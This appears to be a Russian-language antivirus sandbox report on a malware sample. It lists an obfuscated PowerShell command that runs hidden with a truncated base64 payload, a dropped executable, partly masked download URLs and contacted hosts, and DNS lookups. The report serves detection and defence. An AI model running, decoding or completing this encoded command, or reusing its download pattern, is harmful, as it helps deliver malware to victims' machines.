Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABwAHQAMgBuAGYAVgA9ACcAdwB1AFcAaABVAFIARgBwACcAOwAkAGYATgBGADEAaQBKACAAPQAgACcANQAyADIAJwA7ACQAbwBBADEAbABrADYAaAA9ACcAUwBTAGIAUQBfAEwAJwA7ACQAWgBQADMATABLADQAYgA9ACQAZQBuAHYAOgB1AHMAZ...
- %HOMEPATH%\522.exe
- 'rw###nes.com':80
- 'ty####.tybit.com':80
- 'ai#.com':443
- 'si###adas.com':80
- 'fa###ook.com':443
- 'bu####nitaly.com':80
- http://rw###nes.com/images/jq4/
- http://ty####.tybit.com/?na###############
- http://si###adas.com/wp-includes/js/tinymce/plugins/link/m8/
- 'ai#.com':443
- 'we#####-design.ait.com':443
- 'fa###ook.com':443
- DNS ASK rw###nes.com
- DNS ASK ty####.tybit.com
- DNS ASK ai#.com
- DNS ASK we#####-design.ait.com
- DNS ASK in######onenimpuestos.com
- DNS ASK si###adas.com
- DNS ASK fa###ook.com
- DNS ASK bu####nitaly.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABwAHQAMgBuAGYAVgA9ACcAdwB1AFcAaABVAFIARgBwACcAOwAkAGYATgBGADEAaQBKACAAPQAgACcANQAyADIAJwA7ACQAbwBBADEAbABrADYAaAA9ACcAUwBTAGIAUQBfAEwAJwA7ACQAWgBQADMATABLADQAYgA9ACQAZQBuAHYAOgB1AHMAZ...' (со скрытым окном)